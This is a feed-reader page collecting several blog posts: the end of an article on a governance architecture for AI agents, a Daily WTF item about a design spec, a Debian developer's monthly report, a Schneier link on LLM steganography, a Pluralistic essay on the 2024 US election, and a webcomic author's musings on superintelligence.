  1. Explain: Agent interprets context and articulates the situation in natural language (e.g., “Flood risk score 3/10...”). This creates a narrative artifact for human auditors. It is never parsed for execution logic.
  2. Policy: Agent formulates a structured PolicyProposal carrying the execution-relevant fields the Runtime can validate deterministically. In the underwriting sample, that looks like this:
proposal = PolicyProposal(
  total_insured_value=2_750_000,
  premium=55_000,
  industry="Commercial Property",
  justification="TiV remains below delegated max_tiv and no prohibited industry indicators were found.",
  confidence=0.81,
)

The binding fields (total_insured_value, premium, industry) drive deterministic validation, while justification and confidence remain observability metadata for audit and escalation.

That separation is what makes the evidence model clean: The narrative remains human-readable, the policy remains machine-enforceable, and both can be bound to the same decision lineage without allowing free text to leak into execution.

Pillar 4: Epistemic longevity—memory across decision cycles

Once the agent has a stable role, a fixed mission, and a disciplined output interface, continuity across decision cycles becomes meaningful. This is the pillar most absent from practical implementations—and the one most responsible for a specific class of production failures: the infinite rejection loop.

ROA agents are not stateless inference calls. They are long-lived entities that maintain a decision trajectory across multiple cycles—a Kernel-managed record of prior proposals, their validation outcomes, and the business consequences of those decisions.

The same scoping logic that constrains authority also determines whether memory is meaningful. A long-lived agent operating within a stable role accumulates history from the same class of decisions under similar constraints—past actions and their outcomes are genuinely causally related. A general-purpose assistant handed unrelated tasks may still notice patterns, but those correlations are rarely operationally reliable. Focused responsibility is what separates signal from coincidence in the agent’s memory.

The failure mode this prevents has a name: decision amnesia. Without longevity, the agent repeats the same rejected intent because the rejection is not part of the next decision cycle.
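A minimal sketch of the Kernel-managed trajectory, assuming a hypothetical record shape (the real DIR structure is not specified here):

```python
class DecisionTrajectory:
    """Kernel-managed memory: prior proposals and their validation outcomes
    are carried into the next decision cycle."""
    def __init__(self):
        self.history = []  # (intent, outcome) pairs across cycles

    def record(self, intent: str, outcome: str) -> None:
        self.history.append((intent, outcome))

    def was_rejected(self, intent: str) -> bool:
        return any(i == intent and o == "REJECTED" for i, o in self.history)

trajectory = DecisionTrajectory()
trajectory.record("raise_premium_15pct", "REJECTED")

# Without longevity, the agent re-emits the same intent forever. With it,
# the rejection is part of the next cycle's context and can be avoided.
next_intent = "raise_premium_15pct"
should_retry = not trajectory.was_rejected(next_intent)  # False
```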

With and without Epistemic Longevity

Pillar 5: Decision telemetry—immutable accountability

Every PolicyProposal carries a Decision Flow ID (dfid) that binds it to the full decision context. Rather than dumping unstructured logs, the system constructs a reconstruction primitive—a relational trace connecting:

  • The Input: The exact Context Snapshot (T0) the agent reasoned against.
  • The Validation: The outcome evaluated against the Responsibility Contract.
  • The Outcome: The final execution receipt.

This correlated record enables answering “why did this agent do this, at this specific moment, against what state of the world?” using a standard SQL join across the full decision lifecycle. In higher-assurance deployments, the same structured telemetry can be wrapped into a cryptographically signed proof-carrying intent, allowing independent verification of the decision artifact without asking anyone to trust mutable text logs—exactly the direction high-risk compliance regimes such as the EU AI Act are pushing toward.
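The "standard SQL join" claim can be made concrete with an in-memory sketch. The table and column names here are illustrative, not the DIR schema; only the dfid binding comes from the text.

```python
import sqlite3

# Three telemetry tables bound by a shared Decision Flow ID, so a single
# join reconstructs the full decision lifecycle.
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE context_snapshots  (dfid TEXT PRIMARY KEY, snapshot TEXT);
CREATE TABLE validations        (dfid TEXT PRIMARY KEY, outcome  TEXT);
CREATE TABLE execution_receipts (dfid TEXT PRIMARY KEY, receipt  TEXT);

INSERT INTO context_snapshots  VALUES ('dfid-001', 'T0 state: flood_risk=3');
INSERT INTO validations        VALUES ('dfid-001', 'ACCEPTED');
INSERT INTO execution_receipts VALUES ('dfid-001', 'quote issued');
""")

# "Why did this agent do this, against what state of the world?"
row = db.execute("""
    SELECT c.snapshot, v.outcome, e.receipt
    FROM context_snapshots c
    JOIN validations        v ON v.dfid = c.dfid
    JOIN execution_receipts e ON e.dfid = c.dfid
    WHERE c.dfid = 'dfid-001'
""").fetchone()
```

One row answers the input, the validation, and the outcome at once, which is exactly the reconstruction primitive described above.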

But structured decision telemetry does more than support daily postmortems. Every decision becomes a structured relational record bound by DFID—the same foundation that makes macroscopic failures like Agent Drift detectable before they compound silently across the fleet.

Human-Over-The-Loop—autonomy at scale

The alternative to Human-in-the-Loop is not to remove the human, but to move the human from the execution loop to the design loop.

This is the Human-Over-The-Loop (HOTL) model. The human acts as a Policy Designer who defines and evolves the contract that governs decisions, while the system operates autonomously inside those boundaries. No approval queue. No review fatigue. Governance by Exception is the scalable model.

Figure 2: Human-Over-The-Loop shifts the human from the execution queue to the design loop. The agent runs autonomously within a deterministic contract; the human governs by defining that contract and intervening only on genuine exceptions.

Escalation Triggers. The system escalates only when the agent encounters a situation its contract does not authorize it to resolve alone:

  • Proposed action exceeds a contract authority limit
  • Agent confidence drops below escalate_on_uncertainty threshold
  • External API errors exceed a retry budget
  • No decision has been emitted within a configured inactivity window
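The four triggers above can be sketched as one deterministic check. Field names besides `escalate_on_uncertainty` are illustrative assumptions.

```python
def escalation_reason(proposal_value: float, authority_limit: float,
                      confidence: float, escalate_on_uncertainty: float,
                      api_errors: int, retry_budget: int,
                      idle_seconds: float, inactivity_window: float):
    """Return the first matching escalation trigger, or None if the agent
    may proceed. Every branch is evaluable without interpreting text."""
    if proposal_value > authority_limit:
        return "AUTHORITY_EXCEEDED"
    if confidence < escalate_on_uncertainty:
        return "LOW_CONFIDENCE"
    if api_errors > retry_budget:
        return "RETRY_BUDGET_EXHAUSTED"
    if idle_seconds > inactivity_window:
        return "INACTIVITY"
    return None

# A proposal over the contract's authority limit escalates immediately.
reason = escalation_reason(
    proposal_value=3_000_000, authority_limit=2_750_000,
    confidence=0.81, escalate_on_uncertainty=0.6,
    api_errors=0, retry_budget=3,
    idle_seconds=12, inactivity_window=600,
)  # "AUTHORITY_EXCEEDED"
```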

When a trigger fires, the DecisionFlow enters ESCALATED state. The operator sees the WorkingContext, the PolicyProposal, and the reason for escalation, and can OVERRIDE, MODIFY, or ABORT. This is not an “Approve / Reject” queue; it is targeted intervention.

Escalation should not be understood as proof that the agent reliably knows what it does not know. LLMs are poor judges of their own uncertainty, so the architecture does not trust introspection. The escalate_on_uncertainty threshold is a useful heuristic, not a ground truth: the system forces escalation when declared confidence falls below the threshold, or when the proposal violates contract parameters the Kernel can evaluate deterministically. If the model produces a bad proposal with high confidence, the Runtime still blocks it. The agent may signal uncertainty; the Runtime decides whether that uncertainty matters.

Frozen Context + JIT. The operator reviews the proposal against the exact snapshot of the world the agent saw at T0, avoiding the TOCTOU (Time-of-Check to Time-of-Use) problem: The human audits the machine’s decision using exactly the data the machine saw.

But the world keeps moving. Hitting “OVERRIDE” at T1 does not blindly execute the action; it forces the proposal through the Runtime’s JIT (Just-In-Time) Verification gate. If reality has drifted beyond the contract’s Drift Envelope between T0 and T1, the Runtime rejects the override rather than executing a once-valid intent against stale state.
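A minimal sketch of the JIT gate, assuming the Drift Envelope is expressed as a relative tolerance on a monitored value (the actual envelope definition may differ):

```python
def jit_verify(value_at_t0: float, value_at_t1: float,
               drift_envelope: float) -> bool:
    """Re-check a once-valid proposal against current state before executing.
    The envelope bounds how far reality may move between T0 and T1."""
    if value_at_t0 == 0:
        return value_at_t1 == 0
    drift = abs(value_at_t1 - value_at_t0) / abs(value_at_t0)
    return drift <= drift_envelope

# Quoted price moved 2% between snapshot and override: within a 5% envelope.
ok = jit_verify(100.0, 102.0, drift_envelope=0.05)     # True
# Moved 12%: reject the override rather than execute against stale state.
stale = jit_verify(100.0, 112.0, drift_envelope=0.05)  # False
```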

Contract Evolution. The right long-term response to a legitimate edge case is usually not repeated override, but contract change. If business reality shifts, the operator updates the Responsibility Contract and deploys a new version. The system adapts through version-controlled governance boundaries rather than prompt edits or fine-tuning.

Escalation Budget. Escalation is rate-limited by a token bucket per agent (for example, 3 escalations per hour). If an agent exhausts that budget, the Runtime transitions it to SUSPENDED, records the state change, and blocks new DecisionFlows until an operator intervenes. This prevents Escalation DDoS and contains runaway reasoning costs.
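The rate limit described above is a standard token bucket; here is a deterministic sketch (the clock is injected for testability, and the 3-per-hour figure is the example from the text):

```python
class EscalationBudget:
    """Token bucket per agent: e.g. 3 escalations per hour."""
    def __init__(self, capacity: int, refill_per_second: float):
        self.capacity = capacity
        self.tokens = float(capacity)
        self.refill_per_second = refill_per_second
        self.last = 0.0  # timestamp of the previous check

    def try_escalate(self, now: float) -> bool:
        # Refill proportionally to elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.refill_per_second)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False  # budget exhausted -> Runtime moves the agent to SUSPENDED

# 3 tokens, refilling at 3 per hour.
budget = EscalationBudget(capacity=3, refill_per_second=3 / 3600)
results = [budget.try_escalate(now=0.0) for _ in range(4)]  # 4th attempt fails
```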

Confidence ≠ Authority. An agent may emit a proposal with confidence=0.99, and if that proposal exceeds contract authority, the Runtime rejects it. Self-assessed certainty is not permission.

Figure 3: HITL scales supervision cost with agent volume. HOTL shifts that cost to policy design—the human governs the production line, not individual decisions.

Wrapping, not replacing: The role of existing frameworks

Adopting the ROA pattern does not mean discarding the tools your engineering teams have spent the last year mastering. Frameworks like LangChain, AutoGen, and CrewAI excel at orchestrating complex reasoning loops, RAG pipelines, and tool use. ROA is not designed to compete with them; it is designed to govern them.

Figure 4: The ROA pattern wraps existing orchestration frameworks (like LangChain or CrewAI) in User Space, restricting direct execution and forcing output through a structured Policy Proposal validated by Kernel Space.

In practice, you can take a mature LangChain agent and wrap it inside an ROA boundary. The underlying framework still handles the probabilistic reasoning (User Space orchestration). The architectural shift is simple but consequential: you filter the framework’s tool space. You physically remove exchange.execute_trade() or db.drop_table() from the LangChain agent’s toolbox. Instead, you provide it with a single, sandboxed tool: emit_policy_proposal(). The agent reasons, iterates, and eventually calls that tool to emit its final intent. The ROA wrapper catches this claim, may perform a local self-check as a noise-reduction heuristic, and forwards the PolicyProposal across the boundary to the Kernel Space for actual enforcement. You keep the power of the framework, but you gain deterministic execution governance where it matters.
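The tool-space filtering can be sketched framework-agnostically. The tool names below are the examples from the text; the toolbox dictionary and `PROPOSAL_RECORDED` status are illustrative assumptions, not a LangChain API.

```python
captured = []  # stand-in for the ROA wrapper's outbound proposal channel

def emit_policy_proposal(total_insured_value: float, premium: float,
                         industry: str, justification: str,
                         confidence: float) -> str:
    """The single tool exposed to the wrapped agent. It records a typed
    claim for the Kernel; it performs no side effects itself."""
    captured.append({
        "total_insured_value": total_insured_value,
        "premium": premium,
        "industry": industry,
        "justification": justification,
        "confidence": confidence,
    })
    return "PROPOSAL_RECORDED"

# Filtering the tool space: dangerous tools are physically absent.
full_toolbox = {"execute_trade": None, "drop_table": None,
                "emit_policy_proposal": emit_policy_proposal}
roa_toolbox = {name: fn for name, fn in full_toolbox.items()
               if name == "emit_policy_proposal"}

# The wrapped agent (LangChain, CrewAI, ...) can only call what it is given.
status = roa_toolbox["emit_policy_proposal"](
    2_750_000, 55_000, "Commercial Property",
    "TIV below delegated max_tiv.", 0.81,
)
```

Because `execute_trade` never enters the agent's toolbox, no amount of injected text can make the framework call it; the only reachable effect is emitting a claim.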

Costs and trade-offs

ROA is not free. It introduces engineering overhead precisely because it replaces informal trust with explicit governance.

  • Validation gates and JIT checks add latency to every side-effectful decision.
  • Responsibility Contracts add design overhead: authorship, versioning, ownership, and review now have to be explicit.
  • DFID-linked auditability adds storage, tracing, and operational integration work.
  • Escalation thresholds and budgets require domain tuning; bad defaults either flood operators or hide legitimate exceptions.

These costs are justified only when the downside of an incorrect side effect is materially higher than the cost of controlling it. For RAG chatbots and low-risk assistants, this architecture is often excessive. For high-stakes systems, it is the cost of building a real boundary.

Conclusion: Architecture, not alchemy

Five pillars. One architectural commitment: an agent that cannot be trusted to govern itself must operate inside a system that governs it instead. The Responsibility Contract bounds authority. The Mission locks the objective. Epistemic Isolation ensures output is a claim, not a command. Longevity prevents the system from forgetting what it already learned. Audit makes every decision reconstructable. The ROA pattern—a Responsibility Contract instead of a capability list, Claims instead of Commands, a deterministic kernel instead of an informal prompt—composes these into a single enforceable boundary. Intent is structured by the agent. Boundaries are enforced by the contract. Telemetry is accumulated by DFID. The Human-Over-The-Loop model reserves human judgment for genuine exceptions, not approval queues. Together, they transform a probabilistic model into a governable production actor.

Once deterministic execution boundaries and DFID-linked telemetry are in place, a different class of day-three questions becomes possible: Which agents stay within limits yet quietly destroy margin? Which decision patterns justify automatic suspension before humans notice the drift? How do we reconstruct any action to a regulatory standard, and how do we govern a fleet where agents carry different risk profiles and decision weights?

Responsibility is the missing execution-governance layer—and it belongs in the architecture, not the system prompt.

The era of AI demos is ending. The era of AI production systems is beginning. Those systems will not be distinguished only by the intelligence of their models. They will also be distinguished by the rigor of their governance.


This article provides a high-level introduction to Responsibility-Oriented Agents and the Decision Intelligence Runtime and their approach to production resiliency and operational challenges. The full DIR specification, ROA contract schemas, and reference implementations are available as an open source project on GitHub.

13:49

Representative Line: A Solid Reference [The Daily WTF]

Today's anonymous submitter works for a large company. It's one of those sorts of companies which has piles, and piles, and piles of paperwork and bureaucracy. It also means that much of their portfolio of software is basic CRUD applications. "Here's a database for managing invoices." "Here's a database for managing desk assignments." "Here's a pile of databases which link our legacy applications to our new ERP system."

Which brings us to our representative line. It is not a representative line of code, but a representative line of the design specification. This is the design specification for yet another database-driven application.

7.7 REFERENTIAL INTEGRITY CONSTRAINTS
Referential integrity constraints are not applicable for [REDACTED] Application.

Upon seeing this, our submitter predicted that they'd be having a lot of TDWTF submissions in their future.

The worst part? This isn't the only time this has been included in the design spec. Several database driven applications have had this line in their spec. No one is able to explain exactly why referential integrity constraints are not applicable. At best, there are a few batch jobs that don't define a schema themselves, though they need to comply with it. Maybe someone is just copying and pasting from an old design spec and hoping no one notices or cares?

Good news: it's likely that no one will notice, or care. At least not until something breaks in production.


13:35

Colin Watson: Free software activity in April 2026 [Planet Debian]

My Debian contributions this month were all sponsored by Freexian.

You can also support my work directly via Liberapay or GitHub Sponsors.

dput-ng

Ian Jackson reported that dput-ng could lose data when using the local install method (relevant in tests of other packages, for instance) and filed an initial merge request to fix it. I improved this to isolate its tests properly, and uploaded it.

groff

I upgraded from 1.23.0 to 1.24.1. 1.24.0 and 1.24.1 were the first upstream releases since 2023, and had extensive changes; I’d had the corresponding packaging changes in the works since January, but it took me a while to get round to finishing them off. It was good to get this off my list.

OpenSSH

I released bookworm and trixie fixes for CVE-2026-3497, and issued the corresponding BSA-130 for trixie-backports.

I upgraded from 10.2p1 to 10.3p1.

parted

I upgraded from 3.6 to 3.7. 3.7 was the first upstream release since 2023, but the changes were nowhere near as extensive as groff, so this was a fairly quick job. I also fixed the parted-doc package to ship proper API documentation.

Python packaging

New upstream versions:

I started an upstream discussion about how best to handle the pydantic and pydantic-core packages now that they share an upstream git repository.

Other bug fixes:

Rust packaging

New upstream versions:

YubiHSM packaging

I upgraded from 2.7.2 to 2.7.3.

Code reviews

12:14

LLMs and Text-in-Text Steganography [Schneier on Security]

Turns out that LLMs are really good at hiding text messages in other text messages.

11:28

Pluralistic: 2024 (apart from the obvious) (11 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links

  • 2024 (apart from the obvious): Some unforced errors.
  • Hey look at this: Delights to delectate.
  • Object permanence: Denmark legalizing music trading; Babysuit; Patent Office invites "peer review"; DRM protest at the Bastille; Scientology's "super powers"; Banana Dalek; Florida v pediatricians' gun safety advice; Copyright filters and wage theft; "Who Broke the Internet?" Vatican astronomer v Creationism; Teens, privacy and Facebook; Čapek's graveside robot; Save iTunes; NZ laundered money for Latinamerica's looters; Memex Method.
  • Upcoming appearances: Barcelona, Berlin, Hay-on-Wye, London, NYC, Edinburgh.
  • Recent appearances: Where I've been.
  • Latest books: You keep readin' em, I'll keep writin' 'em.
  • Upcoming books: Like I said, I'll keep writin' 'em.
  • Colophon: All the rest.



A meat grinder; disappearing into the top is a sad donkey dressed in Democratic Party livery; emerging from the bottom is a Trump-wigged elephant in GOP livery. The grinder bears an 'I Voted' sticker, with a ? added to the end of it. The background is a Dore engraving of a cloudy sky, tinted blue.

2024 (apart from the obvious) (permalink)

Just as Hillary Clinton positioned her run as a third term for Obama ("America is already great"), so did Biden (and then Harris) position their campaigns as a second Biden term. As Biden said (in 2019): "Nothing would fundamentally change":

https://www.salon.com/2019/06/19/joe-biden-to-rich-donors-nothing-would-fundamentally-change-if-hes-elected/

So a vote for Biden would be a vote for another four years of forceful, material support for genocide; another four years of compromise with the Democratic establishment on student debt and healthcare gouging; and another four years of a president who was obviously in mental decline.

Harris's campaign was, "A vote for me is a vote for all of the above (minus the cognitive decline)." Actually, it was worse: by conspicuously failing to campaign on the Biden administration's record on reining in corporate power, a vote for Harris was "A vote for all of the above, minus the mental decline and the antitrust."

Whereas a vote for Trump was a vote for change, a vote to give the establishment a black eye. It was also a vote for genocide and racist pogroms and gangster kleptocracy, which is why many voters stayed home, casting a ballot for America's all-time favorite candidate, "None of the above," while any number of furious people and/or vicious racists turned out for Trump.

There's one book that crystallizes my thoughts on this better than any other: Naomi Klein's 2023 Doppelganger, which analyzes our politics in terms of (warped) "mirror images." One of the mirror world pairings that Klein analyzes is the progressive movement, a coalition of liberals and leftists (led by liberals).

Like every coalition, the two main groups that constitute "the progressives" do not agree on many important issues, though they do have common goals. Both groups support equality for people of all genders and races, but for liberals, an equal world is one that fixes the problem that 150 straight white men own everything by replacing 75 of them with racialized people, women and queer people (whereas the leftist fix is abolishing the system in which 150 people own everything).

Biden set himself up as a peacemaker for this coalition, and his "unity task force" divided up the appointments in his administration between the Warren-Sanders leftists and liberals, including those who clearly belonged to the Manchin-Sinematic universe. This meant that his administration worked at cross-purposes to itself, neutering its boldest initiatives, rendering them impotent.

Take Biden's plan to finally allow Medicare to negotiate drug prices with pharma companies, a move that was very long overdue. Before this, the way the system worked was: pharma companies named a price – any price! – and then Uncle Sucker paid it. No other country in the world operates this way, and, of course, the lion's share of pharma R&D costs are already borne by the American public (or they were, until Musk DOGEd the US research budget to death).

So the American public pays more than anyone else in the world to develop these drugs, and then they pay more than anyone else in the world to buy these drugs. This is madness, and putting an end to it is an obvious political win. But Biden found a way to do it that "balanced" the leftist principle of protecting people from capitalist exploitation with the liberal principle of protecting businesses lest the essential function of developing life-saving drugs become a state activity (rather than a market one).

Biden's solution? A "Build Back Better" plan that would allow the federal government to negotiate up to ten drug prices (and as few as zero drug prices), but the new prices would only kick in after the 2024 election, so no one would see the benefit of this in time for the next general election:

https://pluralistic.net/2021/11/18/bipartisan-consensus/#corruption

This is a solution that pleases no one – and that's the point. Biden and his team viewed the presidency as an institution for making sure everyone was equally unhappy, a philosophy that Anat Shenker-Osorio calls "pizzaburger politics." This is named for a thought-experiment in which half your family wants pizza and the other half wants burgers, so you serve them "pizzaburgers" and make everyone miserable and declare yourself to have the fair-handed wisdom of Solomon (yes, I'm aware that this analogy has a fatal flaw in that pizzaburgers actually sound delicious, but work with me here).

Biden prided himself on running a pizzaburger presidency, in which every move that satisfied the left of his party was neutralized by a concession to the party's right wing establishment:

https://pluralistic.net/2024/05/29/sub-bushel-comms-strategy/#nothing-would-fundamentally-change

(Trump enacted a mirror-world version of Biden's pharma price controls: TrumpRx, a program that claims to lower drug prices while those prices actually go up):

https://democrats-energycommerce.house.gov/sites/evo-subsites/democrats-energycommerce.house.gov/files/evo-media-document/e-c-democrats-trumprx-big-talk-little-savings.pdf

Biden's pizzaburger compromises made everyone unhappy. He appointed generational talents like Lina Khan, Jonathan Kanter and Rohit Chopra to run key agencies charged with crushing corporate power, and then gave lifetime appointments to corporate-friendly judges who blocked their rulemakings and penalties:

https://www.aljazeera.com/news/2023/7/11/us-judge-turns-down-challenge-to-microsoft-merger-with-activision

Of course, it wasn't just Biden's own judicial appointees who stood in his way; from the Supreme Court on down, on issues from student debt cancellation to noncompetes, judges blocked the Biden administration. When this happened, Biden somehow couldn't find his way to his bully pulpit. Rather than working the refs – the way Trump does, in ways that energize his base, stiffens his legislators' resolve and intimidates other judges – Biden tinkered in the margins to find ways to advance half-measures and stayed mum in public.

This compromise-oriented meekness carried over into Biden's relationship with Democratic lawmakers who sold out the American people. Rather than campaigning for the primary opponents of monsters like Fetterman, Sinema and Manchin, Biden worked behind the scenes to broker compromises, delivering yet another inedible pizzaburger (and acting hurt and bewildered when no one thanked him for it). The alternative? Constitutional hardball:

https://pluralistic.net/2024/10/18/states-rights/#cold-civil-war

It's not clear whether Harris's abbreviated campaign could have made the public case that she would govern in a more muscular fashion as befitted the polycrisis facing the nation, but she didn't even try. A couple Democratic Party insiders of my acquaintance tell me that Biden only agreed to step aside on the condition that Harris not criticize his record. I don't know if that's true, but even within that hypothetical constraint, Harris hardly presented herself as an avatar of change. She carried on Biden's tradition of conspicuously failing to campaign on the significant achievements of Biden's own trustbusters, and put her brother-in-law, the lawyer who helped Uber crush labor rights in California, in charge of her campaign:

https://www.nytimes.com/2024/08/04/us/politics/kamala-harris-tony-west.html

The point of all this is that the American people have, on two occasions, comprehensively rejected the "America is already great"/"Nothing would fundamentally change" politics of a liberal-dominated left/liberal progressive coalition. The senior partners in that coalition have driven the country into a ditch, letting Trump stage a fascist takeover that has us fighting not to win another election, but just to have another one.

Americans are sick of being told that their politicians can't do anything because "they're not the Green Lantern:"

https://pluralistic.net/2023/01/10/the-courage-to-govern/#whos-in-charge

America isn't already great. If we are to have more elections – much less win them – we will need to mobilize millions of people. You don't do that by telling them to oppose Trumpismo – you get them out in the streets by giving them something to support. That was Mamdani's winning message: "I know what a politician can do, and I will do it":

https://pluralistic.net/2026/02/24/mamdani-thought/#public-excellence


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Denmark plans to legalize music trading https://edition.cnn.com/2001/TECH/internet/05/07/denmark.downloads.idg/index.html

#20yrsago Babysuit https://web.archive.org/web/20060513013815/https://www.gildlilies.com/pop_ups/phillip_toledano_kaleidoscope.htm

#20yrsago Patent office will ask the public to “peer review” inventions https://web.archive.org/web/20060512051743/http://www.dotank.nyls.edu/communitypatent/

#20yrsago Report from France’s DRM protest at Place de la Bastille https://web.archive.org/web/20170902135411/https://tofz.org/?dir=Paris%2Fevents%2FMarch

#20yrsago Interactive maps show your city’s floodline when the sea rises https://flood.firetree.net/

#20yrsago Scientology to open “Super Power” training center in FL https://web.archive.org/web/20060522112457/http://www.sptimes.com/2006/05/06/Tampabay/Scientology_nearly_re.shtml/

#20yrsago Homemade radios http://www.duntemann.com/radiogallery.htm

#20yrsago Vatican astronomer denounces Creationism as “paganism” https://web.archive.org/web/20060517013332/http://news.scotsman.com/international.cfm?id=674042006

#20yrsago Canada’s New Democratic Party embraces copyfighting musicians https://web.archive.org/web/20060520024734/http://www.ndp.ca/page/3713

#15yrsago Teens and privacy online: using Facebook is compatible with valuing privacy https://www.zephoria.org/thoughts/archives/2011/05/09/how-teens-understand-privacy.html

#15yrsago Ann Arbor library acquires lending, sharing and copying rights to Creative Commons music catalog https://annarborchronicle.com/2011/04/28/ann-arbor-library-signs-digital-music-deal/

#15yrsago Tin robot on Karel Čapek’s grave https://www.gilesorr.com/travels/Prague2011/BestPrague.20110421.6142.GO.CanonSX10.html

#15yrsago Just look at this banana Dalek. https://web.archive.org/web/20110716022131/https://www.daleksoftheday.com/2011/05/banana-dalek.html

#15yrsago NRA and Florida gag pediatricians: no more firearm safety advice for parents https://www.npr.org/2011/05/07/136063523/florida-bill-could-muzzle-doctors-on-gun-safety

#10yrsago Conservative economics: what’s happened to the UK economy after a year of Tory rule https://web.archive.org/web/20160509113126/https://www.independent.co.uk/news/business/news/what-has-happened-to-the-economy-under-the-tories-in-six-charts-a7017131.html

#10yrsago Save iTunes: how the W3C’s argument for web-wide DRM would have killed iTunes https://www.eff.org/deeplinks/2016/04/save-itunes

#10yrsago America’s courts are going dark https://www.justsecurity.org/30920/courts-going-dark/

#10yrsago Australian government issues report calling for copyright and patent liberalisation https://www.eff.org/deeplinks/2016/05/australian-productivity-commission-slams-protectionist-copyright-and-patent-laws

#10yrsago Panama Papers: New Zealand is the go-to money launderer for crooked Latin Americans https://www.rnz.co.nz/news/panama-papers/303356/nz-at-heart-of-panama-money-go-round

#10yrsago Safe Patient Project: searchable spreadsheet tells Californians whether their doc is on probation, and why https://web.archive.org/web/20160507002350/http://consumersunion.org/research/california-doctors-on-probation/

#5yrsago The Memex Method https://pluralistic.net/2021/05/09/the-memex-method/

#5yrsago How copyright filters lead to wage-theft https://pluralistic.net/2021/05/08/copyfraud/#beethoven-just-wrote-music

#1yrago Who broke the internet? https://pluralistic.net/2025/05/08/who-broke-the-internet/#bruce-lehman


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification: Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

11:07

Grrl Power #1459 – Chemical Frenemies? [Grrl Power]

She likes him because he challenges her. And by “likes,” I mean she hasn’t killed him yet for challenging her. Or for being an arrogant ass.

No, the story about the MIT/CERN kid isn’t Deus’s backstory, but it apparently is a not-uncommon arc for child prodigies who grow up surrounded by a bunch of average brain types, then finally settle into some bleeding edge profession, and learn that they’re in the 50th percentile of the intelligentsia 1%.

I think exponential intelligence is genuinely incomprehensible, because individuals or groups at one intelligence level really lack the tools to understand a group that’s, for instance, ten times as smart. Of course, “ten times” is impossible for us to really quantify anyway, because “ten times” what? The word “intelligence” is really poorly defined in absolute terms. I mean, if you’re good at math but can’t remember dates and anniversaries, are you smarter than someone who struggles to add 15 and 7, but has an eidetic memory? Or is the world’s best astrophysicist smarter than the world’s best diplomat? One can figure out what dark energy is; the other can save hundreds of millions of lives by preventing wars. How much does emotional intelligence factor in? Without it, we’d have a world of sociopaths. At a certain point, information throughput becomes a limiting factor. Is a once-in-a-generation genius who secludes himself and occasionally publishes some revolutionary mathematical proof “smarter” than The Machine from Person of Interest? (That was a show where a massive supercomputer processed every video and phone call and text message, etc., and alerted the Feds to terrorist plots – which sounds terribly dystopian, but the inventor (the glasses guy from Lost) made it a closed system so the government couldn’t use it to spy. The bulk of the episodes revolved around the fact that it could also detect people plotting non-national level crimes like murder, so the inventor put in a backdoor that would spit out a Person of Interest, and they wouldn’t know if it was the perpetrator or the victim. Anyway, I thought it was an entertaining show.) You’d probably say that The Machine in this case wasn’t intelligent at all, but throughout the series, it demonstrated an ability to learn and had a non-human intelligence that allowed it to stay ahead of the evil government agencies and corporations that wanted to abuse its abilities.

The point is, actual capital-S Super intelligence is one of those things that are on Archon’s short list of Apocalypse level threats, because it’s very likely that the individual with that ability could out-plot, out-plan, and out-prepare the entirety of the rest of the human race. If Deus built a suit of armor or a rocket powered paraglider and wore a goblin mask so he could rob banks, no one would give a crap about him on the macro level. Instead, he has the resources of a medium-sized-and-growing country and access to alien technology and probably demonic magic. So he’s being watched by a lot of agencies and interests. Some think he might become an exploitable resource, but they’re dumb. I mean, literally, compared to him, they’re very very dumb. Of course, that’s not to say he’s the only super intelligence on Earth. But most of the known ones are more like Digit. Focused on tangible sciences and engineering, not his broader approach to economics, diplomacy and politics.

